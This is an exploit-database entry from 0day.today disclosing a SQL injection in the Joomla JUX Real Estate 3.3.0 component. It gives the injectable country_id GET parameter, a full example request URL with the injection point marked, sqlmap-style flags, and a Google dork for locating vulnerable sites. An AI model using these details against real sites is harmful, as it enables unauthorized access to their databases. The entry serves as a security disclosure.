[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla JUX Real Estate 3.3.0 SQL Injection Vulnerability

Author
Bilal Kardadou
Risk
[
Security Risk High
]
0day-ID
0day-ID-29389
Category
web applications
Date add
07-01-2018
Platform
php
################################################
#Title: Joomla! JUX Real Estate 3.3.0 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: https://joomlaux.com
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jux-real-estate/
#Product: 'Joomla! JUX Real Estate 3.3.0'
#Developer: JoomlaUX
#Extension type: Plugin
#Last updated: Oct 30 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: inurl:"index.php?option=com_jux_real_estate"
################################################
#
#  Description:
# JUX Real Estate is a JOOMLA component designed to fit a multitude of real
estate related needs, and it is developed by JoomlaUX team.
#
#
# --Method=GET -p [country_id]
#
#  -u "
http://127.0.0.1/realestate/index.php?option=com_jux_real_estate&view=realties&Itemid=148&title=a&price_slider_lower=28607&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=0&cat_id=0&country_id=[SQLI]&locstate=&beds=0&agent_id=&baths=0&jp_yearbuilt=&button=Search
"
#
#  PoC:
#  https://prnt.sc/hw0u6q
#
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

#  0day.today [2024-11-16]  #